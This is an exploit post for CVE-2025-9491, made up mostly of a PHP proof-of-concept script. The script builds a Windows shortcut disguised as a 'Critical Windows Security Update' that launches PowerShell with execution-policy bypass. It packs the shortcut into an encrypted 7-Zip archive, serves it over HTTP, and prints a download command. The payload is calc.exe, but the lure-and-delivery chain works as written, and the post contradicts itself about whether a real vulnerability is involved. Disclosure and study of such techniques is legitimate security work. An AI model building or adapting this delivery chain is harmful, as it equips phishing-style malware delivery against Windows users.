============================================================================================================================================= | # Title : Windows LNK File UI Misrepresentation Vulnerability Leading to Remote Code Execution | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) | | # Vendor : System built‑in component. No standalone download available | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/212542/ & CVE-2025-9491 [+] Summary : This PHP script is a Proof-of-Concept (PoC) tool that demonstrates how to: Create a Windows LNK (shortcut) file that executes a PowerShell command (in this example, launches calc.exe). Package the LNK file into a 7-Zip archive, optionally with a password. Host the archive on a simple HTTP server using PHP’s built-in server. Provide a PowerShell command that can download the archive from the HTTP server. It is meant for educational and defensive testing, not exploitation. It does not contain a real vulnerability — it simply shows the technique of using LNK + PowerShell delivery. [+] Key technical points: Uses Windows COM to create the LNK file. Falls back to PowerShell if COM fails. Optionally compresses with 7-Zip. Starts HTTP server to serve the payload. Designed to be run from the CLI on Windows. POC : php poc.php scriptDir = $this->getScriptDirectory(); $this->localIP = $this->getLocalIP(); } private function getScriptDirectory() { return dirname(__FILE__); } private function getLocalIP() { $ip = gethostbyname(gethostname()); // محاولة الحصول على IP حقيقي $sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP); socket_connect($sock, "8.8.8.8", 53); socket_getsockname($sock, $ip); socket_close($sock); return $ip; } public function createMaliciousLNK() { $lnkPath = $this->scriptDir . '\\Critical_Update.lnk'; echo "[*] Creating malicious LNK file...\n"; try { // في PHP على Windows، يمكن استخدام COM $shell = new COM('WScript.Shell'); $shortcut = $shell->CreateShortcut($lnkPath); $shortcut->TargetPath = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'; $shortcut->Arguments = '-NoProfile -ExecutionPolicy Bypass -Command "Start-Process calc.exe; echo Windows Update Completed"'; $shortcut->WorkingDirectory = 'C:\\Windows\\System32'; $shortcut->Description = 'Critical Windows Security Update - KB5029244'; // محاولة تعيين أيقونة $iconPaths = [ 'C:\\Windows\\System32\\shell32.dll', 'C:\\Windows\\System32\\imageres.dll', ]; foreach ($iconPaths as $iconPath) { if (file_exists($iconPath)) { $shortcut->IconLocation = $iconPath . ',78'; break; } } $shortcut->WindowStyle = 7; // SW_SHOWMINNOACTIVE $shortcut->Save(); if (file_exists($lnkPath)) { echo "[+] LNK created: $lnkPath\n"; return $lnkPath; } else { return null; } } catch (Exception $e) { echo "[-] Error: " . $e->getMessage() . "\n"; // طريقة بديلة باستخدام PowerShell return $this->createLNKWithPowerShell(); } } private function createLNKWithPowerShell() { $lnkPath = $this->scriptDir . '\\Critical_Update.lnk'; $psScript = " \$WshShell = New-Object -ComObject WScript.Shell \$Shortcut = \$WshShell.CreateShortcut('$lnkPath') \$Shortcut.TargetPath = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe' \$Shortcut.Arguments = '-NoProfile -ExecutionPolicy Bypass -Command \"Start-Process calc.exe; echo Windows Update Completed\"' \$Shortcut.WorkingDirectory = 'C:\\Windows\\System32' \$Shortcut.Description = 'Critical Windows Security Update - KB5029244' \$Shortcut.IconLocation = 'C:\\Windows\\System32\\shell32.dll,78' \$Shortcut.WindowStyle = 7 \$Shortcut.Save() "; $psScript = base64_encode(iconv('UTF-8', 'UTF-16LE', $psScript)); $command = "powershell -ExecutionPolicy Bypass -EncodedCommand $psScript"; exec($command, $output, $returnCode); if (file_exists($lnkPath)) { echo "[+] LNK created via PowerShell: $lnkPath\n"; return $lnkPath; } return null; } public function compressWith7Zip($lnkPath, $password = null) { if (!$lnkPath || !file_exists($lnkPath)) { echo "[-] LNK file not found\n"; return null; } // البحث عن 7-Zip $sevenZipPaths = [ 'C:\\Program Files\\7-Zip\\7z.exe', 'C:\\Program Files (x86)\\7-Zip\\7z.exe', '7z.exe', ]; $sevenZip = null; foreach ($sevenZipPaths as $path) { if (file_exists($path)) { $sevenZip = $path; break; } } if (!$sevenZip) { // البحث في PATH exec('where 7z', $output, $returnCode); if ($returnCode === 0) { $sevenZip = '7z'; } else { echo "[-] 7-Zip not found\n"; return null; } } $archiveName = $this->scriptDir . '\\update.7z'; // بناء الأمر $cmd = escapeshellarg($sevenZip) . " a " . escapeshellarg($archiveName) . " " . escapeshellarg($lnkPath); if ($password) { $cmd .= " -p" . escapeshellarg($password); } $cmd .= " -mx9 -mhe=on -t7z"; echo "[*] Compressing with 7-Zip...\n"; exec($cmd, $output, $returnCode); if ($returnCode === 0 && file_exists($archiveName)) { echo "[+] Archive created: $archiveName\n"; if ($password) { echo "[+] Password: $password\n"; } return $archiveName; } else { echo "[-] Compression failed\n"; return null; } } public function startHTTPServer($port = 8080) { echo "[+] Starting PHP built-in server on http://{$this->localIP}:$port\n"; echo "[+] Download URL: http://{$this->localIP}:$port/update.7z\n"; echo "[+] Server running... Press Ctrl+C to stop\n"; $publicDir = $this->scriptDir; // إنشاء ملف router بسيط $routerScript = $publicDir . '\\router.php'; $routerContent = ''; file_put_contents($routerScript, $routerContent); // تشغيل الخادم $command = "php -S {$this->localIP}:$port -t " . escapeshellarg($publicDir) . " " . escapeshellarg($routerScript); echo "Command: $command\n"; echo "You need to run this command manually in another terminal:\n"; echo $command . "\n\n"; // بدلاً من ذلك، يمكن استخدام exec() مع nohup على Unix-like systems // على Windows، يمكن استخدام start if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { $cmdFile = $publicDir . '\\start_server.bat'; $batchContent = "@echo off\nstart /B $command\n"; file_put_contents($cmdFile, $batchContent); echo "[+] Created batch file: $cmdFile\n"; echo "[+] Run it in a new terminal window\n"; } } public function main() { echo str_repeat("=", 60) . "\n"; echo "CVE-2025-9491 LNK Exploit + 7-Zip + HTTP Server (PHP Version)\n"; echo str_repeat("=", 60) . "\n"; // التحقق من نظام التشغيل if (strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN') { echo "[-] This script requires Windows OS\n"; return; } // إنشاء ملف LNK $lnkFile = $this->createMaliciousLNK(); if (!$lnkFile) { echo "[-] Failed to create LNK\n"; return; } // ضغط مع 7-Zip echo "\n[*] Compress with 7-Zip? (y/n): "; $compress = trim(strtolower(fgets(STDIN))); if ($compress === 'y') { echo "[*] Password (optional): "; $password = trim(fgets(STDIN)); if (empty($password)) { $password = null; } $archive = $this->compressWith7Zip($lnkFile, $password); if ($archive) { echo "\n[+] Archive ready: $archive\n"; // بدء خادم HTTP echo "\n[*] Start HTTP server? (y/n): "; $startServer = trim(strtolower(fgets(STDIN))); if ($startServer === 'y') { $this->startHTTPServer(); } echo "\n[+] PowerShell download command:\n"; echo " iwr http://{$this->localIP}:8080/update.7z -OutFile update.7z\n"; // الانتظار للإدخال echo "\n[*] Press Enter to exit..."; fgets(STDIN); } else { echo "[-] Compression failed\n"; echo "[*] Use raw LNK: $lnkFile\n"; } } else { echo "\n[*] Raw LNK file: $lnkFile\n"; } } public function generatePowerShellDownloadCommand() { return "iwr http://{$this->localIP}:8080/update.7z -OutFile update.7z"; } } // التنظيف التلقائي register_shutdown_function(function() { // يمكن إضافة تنظيف الملفات المؤقتة هنا }); // التنفيذ if (PHP_SAPI === 'cli') { $exploit = new WindowsLNKExploit(); $exploit->main(); } else { echo "This script must be run from command line (CLI)\n"; echo "Usage: php " . basename(__FILE__) . "\n"; } // وظائف مساعدة إضافية class HelperFunctions { public static function checkRequirements() { $checks = [ 'PHP Version' => version_compare(PHP_VERSION, '7.0.0', '>='), 'Windows OS' => (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN'), 'COM Support' => extension_loaded('com_dotnet'), 'Exec Function' => function_exists('exec'), ]; return $checks; } public static function showBanner() { $banner = " ╔═══════════════════════════════════════════════════════════╗ ║ CVE-2025-9491 PoC ║ ║ Author: indoushka ║ ╚═══════════════════════════════════════════════════════════╝ "; echo $banner . "\n"; } } // بديل لاستخدام threading في PHP class BackgroundProcess { public static function runInBackground($command) { if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { pclose(popen("start /B " . $command, "r")); } else { exec($command . " > /dev/null 2>&1 &"); } } } ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================